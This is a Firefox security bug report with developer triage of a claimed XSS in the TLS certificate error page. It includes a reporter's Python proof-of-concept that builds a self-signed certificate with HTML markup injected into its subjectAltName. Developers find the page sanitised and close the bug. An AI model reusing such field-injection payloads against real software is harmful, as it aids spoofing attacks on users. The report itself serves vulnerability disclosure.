Closed Bug 1462904 Opened 8 years ago Closed 7 years ago

Text/link injection into TLS error page

Categories

(Firefox :: Security, defect)

Product:
Firefox
Component:
Security
Version:
52 Branch
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED WORKSFORME

People

(Reporter: bashscript, Unassigned, NeedInfo)

Details

(Keywords: csectype-spoof, reporter-external, sec-low)

Attachments

(3 files)

Screenshot from 2018-05-20 01-28-15.png
65.42 KB, image/png
Details
Screenshot from 2018-05-20 01-22-55.png
39.24 KB, image/png
Details
Screenshot from 2018-05-20 02-30-17.png
40.17 KB, image/png
Details
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Build ID: 20180326230345 Steps to reproduce: from twisted.internet.protocol import ClientFactory, Protocol from twisted.internet import ssl, reactor from datetime import datetime, timedelta import OpenSSL,random def generate(): k = OpenSSL.crypto.PKey() k.generate_key(OpenSSL.crypto.TYPE_RSA, 1024) now = datetime.now() expire = now + timedelta(days=365) cert = OpenSSL.crypto.X509() cert.add_extensions([OpenSSL.crypto.X509Extension(b"subjectAltName", False, b", ".join([b'DNS:<a id="cert_domain_link" title="0111">ssss</a>']))]) cert.get_subject().C = "SY" cert.get_subject().ST = "Syria" cert.get_subject().L = "Syria" cert.get_subject().O = "Syria" cert.get_subject().OU = "Syria" cert.get_subject().CN = "Syria.hack.com" cert.set_serial_number(random.randint(990000, 999999999999999999999999999)) cert.set_notBefore(now.strftime("%Y%m%d%H%M%SZ").encode()) cert.set_notAfter(expire.strftime("%Y%m%d%H%M%SZ").encode()) cert.set_issuer(cert.get_subject()) cert.set_pubkey(k) cert.sign(k, 'sha1') return cert,k class EchoClient(Protocol): def connectionMade(self): print("hello, world") self.transport.write(b"hello, world!") def dataReceived(self, data): print("Server said:", data) self.transport.loseConnection() class EchoClientFactory(ClientFactory): protocol = EchoClient def clientConnectionFailed(self, connector, reason): print("Connection failed - goodbye!") reactor.stop() def clientConnectionLost(self, connector, reason): print("Connection lost - goodbye!") reactor.stop() class CtxFactory(ssl.ClientContextFactory): def getContext(self): self.method = OpenSSL.SSL.SSLv23_METHOD ctx = ssl.ClientContextFactory.getContext(self) crt,key = generate() ctx.use_certificate(crt) ctx.use_privatekey(key) return ctx if __name__ == '__main__': factory = EchoClientFactory() reactor.listenSSL(8000, factory, CtxFactory()) reactor.run() #DNS:XSS And you have from firefox on linux other version of firefox-esr but contact on the port under https://127.0.0.1:8000 Actual results: I was surprised when I showed the certificate verification page that there was a xss vulnerability In the place that displays the domain Expected results: View the domain without errors
My native language is Arabic Syria so please programming language to explain
Comment on attachment 8979021 [details] Screenshot from 2018-05-20 01-22-55.png firefox-esr
Comment on attachment 8979021 [details] Screenshot from 2018-05-20 01-22-55.png firefox-esr
Comment on attachment 8979020 [details] Screenshot from 2018-05-20 01-28-15.png firefox
60.0.1,52.0 *
Group: firefox-core-security → crypto-core-security
Component: Untriaged → Security: PSM
Product: Firefox → Core
Thanks for the report. So from your code, and the screenshots its looks like you are able to corrupt the HTML of the certificate error page, but given that you are putting HTML code in your subjectAltName, I'm not actually sure if there is an error here. Do you have an example with a subjectAltName which demonstrates XSS (script injection)? The code [1] which creates this page seems a little complicated. I've tried to trace this, but someone probably needs to debug this code to get an accurate picture of what is happening. From what I can see, we are supposed to show a link, only if the subjectAltName matches the end of document.location.host (or vice versa)[2]. Otherwise we should just show text. Are the attached screenshots all taken with the same PoC code? (ie the PoC code from comment 0?) I'm not sure where the text "domain.com" comes from? We'll need to figure out the actual impact here before we can assign as rating. [1] https://searchfox.org/mozilla-central/source/browser/base/content/content.js#302 [2] https://searchfox.org/mozilla-central/source/browser/base/content/content.js#381
Flags: sec-bounty?
about:certerror is unprivileged which limits the damage considerably https://searchfox.org/mozilla-central/source/browser/components/about/AboutRedirector.cpp#52-53 Could be used for spoofing if someone clicked on it, but there's much else available in that page. Could trigger the exception dialog or set the pref to always submit TLS errors to our Telemetry by sending appropriate events and postMessages. Since the code for about:certerror is shared you might be able to trigger opening the captive portal dialog or similar for anything about:neterror can show you. Some of the functions check which version of the page is showing and some will just honor whichever event they get. I wouldn't expect a CA to allow HTML in a valid cert, but since it takes an invalid cert to trigger this error page anyway such an XSS is a legit attack vector. It just doesn't seem to do much here. Looks like everything is fully sanitized though. In the single domain case we use getLocalizedFragment and in the multiple case we use ParentNode.append() which turns strings into safe text nodes. https://searchfox.org/mozilla-central/source/browser/base/content/content.js#424 There's some code in there where we'll auto-link a bare name -- that's probably where the "domain.com" link comes from in attachment 8979022 [details]. In the older ESR code this is all turned into pure text using the .textContent property so there's no XSS https://dxr.mozilla.org/mozilla-esr52/source/browser/base/content/content.js#300 That's attachment 8979020 [details] I don't know what version attachment 8979021 [details] comes from. The cert error revamp was earlier this winter and probably landed in 60, less likely 59. Maybe '9021 is from 59.0.x? I have no idea what the "111" would be linked to though. Doesn't look like it's the intended injected link because that's still visible in the plain text.
Group: crypto-core-security → firefox-core-security
Component: Security: PSM → Security
Flags: needinfo?(bashscript)
Product: Core → Firefox
Summary: A security vulnerability that threatens the SSL certificate verification page → Text/link injection into TLS error page
Flags: sec-bounty? → sec-bounty-
I can verify that this appears to cause a seemingly harmless glitch in ESR 52 (I can't make it be more harmful than what is shown in the screenshot, no onclick or href). However, this doesn't seem to affect any recent version of Firefox, including ESR. Hence I think it's safe to close this bug.
Status: UNCONFIRMED → RESOLVED
Closed: 7 years ago
Resolution: --- → WORKSFORME
Group: firefox-core-security
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: